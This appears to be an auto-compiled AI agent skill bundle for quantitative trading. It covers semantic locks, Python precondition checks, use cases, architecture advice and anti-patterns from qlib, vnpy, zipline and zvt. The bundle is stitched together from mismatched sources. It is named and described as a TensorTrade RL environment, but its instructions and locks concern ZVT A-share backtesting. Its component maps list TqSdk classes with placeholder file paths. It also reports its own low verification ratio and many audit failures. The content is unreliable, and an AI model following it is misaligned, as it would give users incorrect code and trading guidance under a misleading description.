# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **2**

## `KUC-101`
**Source**: `doc/demo/notebooks/demo.ipynb`

Demonstrates basic TqSdk library usage by connecting to a simulated trading account and retrieving real-time quote data for a futures contract.

## `KUC-102`
**Source**: `doc/demo/notebooks/factor.ipynb`

Analyzes time-dependent volatility patterns in CSI 300 index to extend the standard Black-Scholes option pricing model for improved accuracy.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/api_entry_point_-_task_scheduling.md
# api_entry_point_&_task_scheduling (7 classes)

## `TqApi.wait_update`
`api_entry_point_&_task_scheduling/tqapi-wait-update.py:0`

## `TqApi.get_quote`
`api_entry_point_&_task_scheduling/tqapi-get-quote.py:0`

## `TqApi.get_position`
`api_entry_point_&_task_scheduling/tqapi-get-position.py:0`

## `TqApi.insert_order`
`api_entry_point_&_task_scheduling/tqapi-insert-order.py:0`

## `TqApi.copy`
`api_entry_point_&_task_scheduling/tqapi-copy.py:0`

## `AccountType`
`api_entry_point_&_task_scheduling/accounttype.py:0`

## `DataMode`
`api_entry_point_&_task_scheduling/datamode.py:0`

FILE:references/components/in-memory_data_store_-_diff_protocol.md
# in-memory_data_store_&_diff_protocol (5 classes)

## `Entity.__getitem__`
`in-memory_data_store_&_diff_protocol/entity-getitem.py:0`

## `Quote.last_price`
`in-memory_data_store_&_diff_protocol/quote-last-price.py:0`

## `Position.orders`
`in-memory_data_store_&_diff_protocol/position-orders.py:0`

## `Order.trade_records`
`in-memory_data_store_&_diff_protocol/order-trade-records.py:0`

## `DataStorage`
`in-memory_data_store_&_diff_protocol/datastorage.py:0`

FILE:references/components/market_data_simulation_-_backtest.md
# market_data_simulation_&_backtest (6 classes)

## `TqBacktest.run`
`market_data_simulation_&_backtest/tqbacktest-run.py:0`

## `TqReplay.run`
`market_data_simulation_&_backtest/tqreplay-run.py:0`

## `BtQuote.datetime`
`market_data_simulation_&_backtest/btquote-datetime.py:0`

## `TqBacktest._generator_diffs`
`market_data_simulation_&_backtest/tqbacktest-generator-diffs.py:0`

## `TimeGenerator`
`market_data_simulation_&_backtest/timegenerator.py:0`

## `DataSource`
`market_data_simulation_&_backtest/datasource.py:0`

FILE:references/components/order_execution_-_matching.md
# order_execution_&_matching (7 classes)

## `SimTradeBase.insert_order`
`order_execution_&_matching/simtradebase-insert-order.py:0`

## `SimTradeBase.cancel_order`
`order_execution_&_matching/simtradebase-cancel-order.py:0`

## `SimTrade.match_order`
`order_execution_&_matching/simtrade-match-order.py:0`

## `SimTradeBase.settle`
`order_execution_&_matching/simtradebase-settle.py:0`

## `BaseSim._ensure_quote`
`order_execution_&_matching/basesim-ensure-quote.py:0`

## `MatchingEngine`
`order_execution_&_matching/matchingengine.py:0`

## `FeeCalculator`
`order_execution_&_matching/feecalculator.py:0`

FILE:references/components/tradeable_account_abstraction.md
# tradeable_account_abstraction (6 classes)

## `Tradeable.send_order`
`tradeable_account_abstraction/tradeable-send-order.py:0`

## `Tradeable.get_position`
`tradeable_account_abstraction/tradeable-get-position.py:0`

## `BaseOtg.connect`
`tradeable_account_abstraction/baseotg-connect.py:0`

## `FutureMixin.get_margin`
`tradeable_account_abstraction/futuremixin-get-margin.py:0`

## `ConnectionBackend`
`tradeable_account_abstraction/connectionbackend.py:0`

## `AssetClass`
`tradeable_account_abstraction/assetclass.py:0`

FILE:references/components/trading_algorithms_-_position_management.md
# trading_algorithms_&_position_management (7 classes)

## `TargetPosTask.set_target_volume`
`trading_algorithms_&_position_management/targetpostask-set-target-volume.py:0`

## `TargetPosScheduler.run`
`trading_algorithms_&_position_management/targetposscheduler-run.py:0`

## `Twap.create_order`
`trading_algorithms_&_position_management/twap-create-order.py:0`

## `InsertOrderTask.insert`
`trading_algorithms_&_position_management/insertordertask-insert.py:0`

## `InsertOrderUntilAllTradedTask.chase`
`trading_algorithms_&_position_management/insertorderuntilalltradedtask-chase.py:0`

## `ExecutionStrategy`
`trading_algorithms_&_position_management/executionstrategy.py:0`

## `OffsetPriority`
`trading_algorithms_&_position_management/offsetpriority.py:0`

FILE:references/components/websocket_connection_management.md
# websocket_connection_management (6 classes)

## `TqConnect.send`
`websocket_connection_management/tqconnect-send.py:0`

## `TqConnect.receive`
`websocket_connection_management/tqconnect-receive.py:0`

## `TqReconnect.reconnect`
`websocket_connection_management/tqreconnect-reconnect.py:0`

## `MdReconnectHandler._is_all_received`
`websocket_connection_management/mdreconnecthandler-is-all-received.py:0`

## `TdReconnectHandler._is_all_received`
`websocket_connection_management/tdreconnecthandler-is-all-received.py:0`

## `ReconnectStrategy`
`websocket_connection_management/reconnectstrategy.py:0`

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Tensortrade Rl Env

Skill

提供多市场回测与强化学习交易环境构建能力，支持多交易所钱包组合管理、Plotly交互式交易可视化及RL智能体训练评估。

---
name: tensortrade-rl-env
description: |-
  提供多市场回测与强化学习交易环境构建能力，支持多交易所钱包组合管理、Plotly交互式交易可视化及RL智能体训练评估。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-130"
  compiled_at: "2026-04-22T13:01:05.354545+00:00"
  capability_markets: "multi-market"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# 强化学习交易环境 (tensortrade-rl-env)

> 提供多市场回测与强化学习交易环境构建能力，支持多交易所钱包组合管理、Plotly交互式交易可视化及RL智能体训练评估。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (19 total)

### Sphinx Documentation Configuration (`UC-101`)
Infrastructure configuration for building TensorTrade documentation using Sphinx
**Triggers**: documentation, sphinx, config

### Portfolio Ledger Setup with Multi-Exchange Wallets (`UC-102`)
Demonstrates how to set up a portfolio with wallets across multiple exchanges (Bitfinex, Bitstamp) and different trading pairs for simulated trading
**Triggers**: portfolio, wallet, ledger

### Trading Chart Visualization with Plotly (`UC-103`)
Visualizes historical price data with technical analysis indicators on interactive Plotly charts for trading analysis and reporting
**Triggers**: chart, plotly, visualization

For all **19** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-130. Evidence verify ratio = 24.5% and audit fail total = 31. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-130` blueprint at 2026-04-22T13:01:05.354545+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Trading Chart Visualization with Plotly', 'Portfolio Ledger Setup with Multi-Exchange Wallets', 'Sphinx Documentation Configuration', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

